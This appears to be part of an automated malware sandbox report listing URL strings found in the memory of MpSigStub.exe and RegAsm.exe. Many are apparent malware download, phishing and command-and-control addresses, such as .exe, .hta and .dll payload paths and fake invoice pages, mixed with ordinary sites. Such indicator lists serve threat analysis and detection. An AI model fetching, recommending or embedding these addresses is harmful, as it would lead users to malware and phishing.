    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://logs-01.loggly.com/inputs
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://lolitaadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://lookfor.cc?pin=%05d
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://looking-for.cc
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://looking-for.ccx
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: http://loscuerposgloriosos.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://lost.to/in.cgi
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://lostart.info/js/gs.js
    Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmpString found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
    Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmpString found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
    Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmpString found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
    Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmpString found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://loygf-99.gq/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://ludnica.uk.to/youtube.xpi
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://luport.com/templates/konkur/language/m
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://luyitaw.com/okasle.exe
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://lychee22.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://mabira.net/traff/controller.php?&ver=8&uid=
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://macr.microfsot.com/noindex.js
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpString found in binary or memory: http://madthumbs.com/archive/
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://mail.8u8y.com/ad/pic/123.txt
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://mail.autoshops.online/gbh.exe
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://mail.bg
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://mail.daum.net/kocl/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://mail.google.com/mail/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://mail.madcoffee.com/index.php
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://mail.rambler.ru/mail/mail.cgi?mode=compose
    Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmpString found in binary or memory: http://mail.tccinfaes.com
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://mail.vodafone.co.uk/
    Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmpString found in binary or memory: http://maindating.com
    Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmpString found in binary or memory: http://maindating.net
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://makevalue.com
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://maktoob.yahoo.com/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://maldonaaloverainc.com/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://malikberry.com/files101/htaanyinwa.hta
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://malikberry.com/files101/htamandela.hta
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://malikberry.com/files101/htazeco.hta
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://malwarec2domain.com:3550/implant.exe
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://malwaredestructor.com/?aid=347
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://malwaredestructor.com/download.php?aid=347
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://manage1lnk.pw
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://maplestory.nexon.com
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpString found in binary or memory: http://maq.com.pk/wehsd
    Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://march262020.club/files/
    Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://march262020.com/files/
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://margate-pawn.com?
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://maribit.com/count11.php
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://maringareservas.com.br/queda/index.php
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: http://markpolak.com
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
    Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmpString found in binary or memory: http://p.k3qh4.com/
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://p.netund.com/go/
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/p?w=%s
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://padgettconsultants.ca/tau.gif
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://pads289.net
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://pantscow.ru:8080/vector_graphic.js
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://paparra.net/invoice/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://partners.sena.com/doc/inv-
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://passagensvhc.online/66.rtf
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/L774bn1U
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/L774bn1Ux
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://paufderhar07ol.ru.com/bb.html
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://pc-scan-online.com/l2.php?t=
    Source: MpSigStub.exe, 00000023.00000003.6272731314.0000028BD7935000.00000004.00000001.sdmpString found in binary or memory: http://pcmaticplus.com/success.html
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://pcvark.com
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmpString found in binary or memory: http://philippelaurent.org/rechnung/
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: http://phimshock-share123vn.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://pic-pic.pw
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://pic.sogou.com/pics?query=%s
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://picosoftnepal.net/ach-form/
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: http://pilasto.host/po.exe
    Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmpString found in binary or memory: http://pilinno.info/cpi/promo.exe
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://ping.180solutions.com
    Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmpString found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://pirsl.com.au/signatures/new.jpg
    Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://pl2.txt.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://plaintexw.com/xx.dll
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: http://planilha.webcindario.com/planilha
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://play.videosongplayer.com/
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://playsong.mediasongplayer.com/
    Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmpString found in binary or memory: http://plugin-install.info/
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://plugin-installer.com/
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://plugin-installer.info/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://plugin.videosraros.info/chrome.xml
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://pluginprovider.com/?rap
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://pmevents.co.in/nd/index.php)
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://pmxmrnull.dynu.net:
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://polifile.co/
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://pomphrett.co.uk/c7fb/install/language/verouiller.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://poppy97.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://portalconnectme.com/56778786598.doc
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://post.medusaranch.com/abonento9.exe
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://premiumclass.bar/0pzional1a.dll
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://premiumclass.cyou/0pzional1a.dll
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: http://private0091111.duckdns.org/qagj/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://privateinvestigatorkendall.com/fo9cwuvlqwua
    Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmpString found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
    Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmpString found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://prs.payperdownload.nl
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://psget.net/GetPsGet.ps1x
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://psynergi.dk/data
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://pubs.vmware.com
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://pulp99.com/
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://pulp99.com/1.rtf
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://pusat-hacing.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://q-i-e-n.com/
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://qiiqur.com/frix.exe
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://quantsa.ru/?de
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: http://qudaih.com/pzlnkda/nbsa
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://queendrinks.com.ar/open-past-due-orders/
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://quince78.cyan.ero0101.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://qwst1t.3322.org:8087
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://r%d.clrsch.com/
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://r%d.clrsch.com/ie/
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://r%d.clrsch.com/x
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://r.funmoods.com//
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpString found in binary or memory: http://r.zerotime.kr/
    Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org/
    Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://raa.qwepoii.org/v4/gtg/
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://random.99lnk.com/y8btd3lq
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://randominterest.com/
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpString found in binary or memory: http://rapidshare.com/files/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://rbmllp.com/member.php
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://readlenta.ru/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://rebrand.ly/ohxnqak
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://recoverpcerror.com/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://redirsystem32.com
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://redirsystem32.com/tds1/in.cgi?2&group=mp3
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://redlogisticsmaroc.com/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://redlogisticsmaroc.com/ti/doc/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://reefer.parts/js/lib/)
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://referfile.com
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://refud.me/scan.php
    Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmpString found in binary or memory: http://registrywizard.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://remitenow.one/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://remote-keylogger.net
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://remove.gettango.com/
    Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmpString found in binary or memory: http://renatopaschoal.com.br/dropbox/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://rentalhabneew.com/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://rep.eyeez.com/GetArea.aspx
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmpString found in binary or memory: http://report.wallpaper.shqingzao.com
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmpString found in binary or memory: http://report.wallpaper.shqingzao.com~
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
